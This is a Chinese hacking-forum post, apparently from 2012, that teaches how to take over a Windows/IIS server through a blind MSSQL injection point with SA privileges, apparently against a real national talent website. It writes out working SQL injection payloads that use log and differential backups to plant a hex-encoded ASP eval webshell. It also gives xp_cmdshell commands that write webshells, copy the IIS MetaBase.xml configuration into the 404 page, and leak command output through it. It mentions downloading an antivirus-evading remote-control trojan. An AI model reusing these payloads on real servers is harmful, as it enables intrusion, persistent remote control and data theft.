找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2124|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
; N: e8 a1 E7 m6 v8 \: f: W, c/ m& T# ^6 ]* f) Q

" |6 @+ r6 \1 ]6 |                                                             欢迎高手访问指导,欢迎新手朋友交流学习。4 t1 n: n  D- C9 a0 z2 Q1 |* M
6 G: O& L( e/ G& k1 f0 d! Y
                                                                 / u0 i3 T2 O$ Z3 B
                                                                 1 R+ m+ W4 g, V( _( ]3 K5 j; I
                                                                  论坛: http://www.90team.net/
) v: g" S% j) l$ \8 h  E) f8 c8 d; j& ~2 S' I% e) h+ W
/ B" y+ @" \8 b/ O8 }
. `- Z* V2 ^1 r* [; Q* ?" F
友情检测国家人才网$ E9 j  _& k5 b) j/ R. u

+ [- v8 g% T  ~2 B$ k7 s& I& \7 M5 I, K* D
内容:MSSQL注入SA权限不显错模式下的入侵
$ G/ U% f5 ~1 P* y7 b) ~- G0 v2 i6 q
7 v/ U5 H  C$ C# ^! R
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。6 r/ r9 ~% Y' h

; L" k5 T0 e/ P我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。  v- T9 u. h. A) s

, S& Q6 u6 M, h6 W
1 ~' k+ m% r- z) d; g9 q* G这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
! `1 t4 F+ q& S  y5 S1 `, k
& A2 E3 V# o* H2 f8 h思路:$ F: |  r. ]/ M9 W
7 P9 {& H$ E% Q9 I3 v- F
首先:
4 U- G, m. p. p" V. f3 U
& o5 w' e7 ]. ?  T" Q" U通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。* }3 p# P2 _1 S
& M" u& {+ t* g3 v: F0 c9 G
1.日志备份获得Webshell+ Q. d- X8 v+ e: n  I3 q5 t) Z
* h, d" j6 T5 H& q9 q0 ^- w  |
2.数据库差异备份获得Webshell
, h5 W" t6 t* @- u$ Y* h1 M# i
0 M- P5 P  x  W4.直接下载免杀远控木马。1 z! ~' f& p/ t& M5 S

' I" a/ n+ ~0 E6 I& c2 O$ y  o! K5.直接下载LCX将服务器端口转发出来% ]7 r; t7 _" F$ R
% C% f# K9 t$ q8 R" T  ?; e
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
: [/ n' J& v' W* [* A
) Q  o) q, N8 J5 ]4 p' X! E9 T
& C6 I9 `: E, D
/ ~# d# H# l5 X, x! V+ K在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
8 `0 C" m7 E9 g6 ~5 n6 E
2 g" a3 y& `3 w, }8 L# c6 B+ g# R我直接演示后面一个方法1 c9 D$ G2 _/ u# ~4 Y4 Z# `

  i+ |) a) T: e" M$ Q
. C! Q6 R9 W* H( b分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
' r( {. U6 Z3 v' Z, |0 C8 n0 ], {$ v! H+ D
) ^# [+ k' `& ~4 h) W

2 e/ c. `- T0 D
, a3 _* ?, d# z  h) z1 [◆日志备份:1 {% K& }+ L" s- b. G1 U
9 y! l( j8 v6 A" d
( [7 i/ y0 S7 ^$ n
1. 进行初始备份
; {* j4 m; d" U! h1 f, C; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--9 @  @2 e3 U% z

  I6 h% I" o5 g, T# n2. 插入数据# w7 b- l2 C7 U6 s2 t
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
# f1 e! }" ?, ]8 k* l4 K9 A7 H: N0 n
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>: O6 b- K' y; b0 Z! F
  # q  A7 ]# M4 S+ I* u  R2 d) a9 s
3. 备份并获得文件,删除临时表+ k  s2 Z$ U9 x- f) d- v
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
, h) P+ {. s2 |, @$ D4 c$ n- P2 ^- C0 `: w( o
( \, J0 _, n4 P  Q

6 P# ?% U7 V7 N. H◆数据库差异备份% z8 @. q" W& w8 W& P" g! ]
. @+ W. C$ e: ~3 \+ a
(1. 进行差异备份准备工作
9 L) @. L/ ~$ g5 J: D: T, B  L" e. I8 z/ ^) G7 f
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
* Q: m/ x0 n0 H- w0 V; d. {
; t& K/ G2 h: F7 U! [1 a( }' h上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
7 k( e  D0 ]' H9 N 9 l, s: _& s, e5 M$ k" ~
8 y/ H9 O  Y: r; ?$ L
(2. 将数据写入到数据库
5 S6 w2 [4 N2 {' \9 q;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--   X3 J3 K8 X" k
$ U  x' G) G) s
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>3 t) y& Y/ G$ m: ^# f1 ^* R0 j

- {' {( y* Z+ }: R5 O5 K3. 备份数据库并清理临时文件* f! g' v4 F' r7 y

# y% N. ?# q2 G  l# l$ s# Q  f0 M;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
/ d, a0 N) U0 Q) V$ h* Q, T+ F: }. R; u0 V$ p1 G
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 $ Y8 i* q+ _4 l( A

) w! p+ e  W# y" U' y% E
: I" l' u1 W: ]# _5 ^- Z4 @6 `
, w! X9 h$ N! M3 H5 k, S用^转义字符来写ASP(一句话木马)文件的方法:   
1 {/ A: C: T9 ?; _' e  c4 c7 z& M/ J5 K) p( z
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
7 c/ v0 i: h) ]% d9 B: ?# S( m5 @1 I; E3 t0 b
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp 9 }' v# x" e, N
; m/ p7 o" F& Y1 V8 u( h
读取IIS配置信息获取web路径# e3 g7 [( z$ R- {: ~

/ X0 J& h* v( @+ g8 r# z6 R     ; o9 Z" Z4 h1 r
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--! Z+ B$ f3 U1 e7 }4 _( d" s
9 M6 ?8 y/ z" q3 h0 {" j& c% \* w
执行命令
7 r4 `) E% r0 ?% m8 g     2 `6 N! B* ?9 S5 i5 r2 u& @
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
+ [6 q$ Y, \* J+ O
& H1 j  |1 w  j" ]! _* y& y1 b% A; G" {2 X5 |& h
# ^7 a7 S0 e. c- x! p* @
2 z4 \% V/ s) }( H; N# C

# Z' i  F7 w0 l3 p% q
* A& ^& O5 ^4 I2 Q. ^, d
$ g5 s4 I4 U  I$ q
; L; u4 J% p; U# s- P& k+ G3 O; B5 e
6 p0 ]* ^8 G9 Z0 _5 q9 s

4 O! u9 i/ h2 Q- j5 k, Q8 }) m1 E  r% I
/ [# S; y8 d- O8 ?, {% @
" [3 Y5 z, J. X& @
5 [1 y" J6 \5 k5 @5 F
+ o" w/ O) @* K
9 k# A  l+ {2 U

/ I, F9 j1 v  C8 P+ d( B
9 @3 Z' @2 d% W: {6 O3 W2 K! A$ D! p: H7 B8 R3 l( _+ h
% M; ^  }' m4 a* b' U) N

" g# I1 u; x; Y
  t" ^) J, g' h% _" Q  M
3 L8 `. C* O; o) U( y+ y' O& H3 M5 a. T
  D9 m7 o8 j5 L" G: _! S

- p1 j, V$ T# N! V8 |& ~
7 ?' w. M* X# Y; n% O, B! G/ ?) H% x; R7 K9 O; A8 p9 b- Y* Y" q

# m& S; K% _. ]' @1 }
3 j3 a3 h, g/ F7 c5 ~9 i, E7 ~9 n+ K+ _
: P$ b( k' X( k. N( A
+ Y7 q3 c4 d' A1 h

$ C/ Y+ E; D! w: w8 S- t# ?2 M# V& z8 Z$ l
( _  z5 O# W- [9 ?1 u; z

- [4 `, \4 x' L' ~, c6 ~3 \, t( u( s& B

" P3 F5 }! B; a$ w2 {2 G+ C6 M% w. F- p2 {

$ V# k0 `% v1 T7 q" d' q. T4 H3 g. c  ~$ j' U- k$ x% a  S% [1 e9 o

* ]% x4 T2 h! M/ R2 j0 s0 q1 i0 B4 O- n* @/ d5 d6 i, a% `
$ l- G, H# y1 n1 y2 s
; Q( l6 f4 l7 w" Z9 J" Y

4 S8 N1 u# C- j  u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表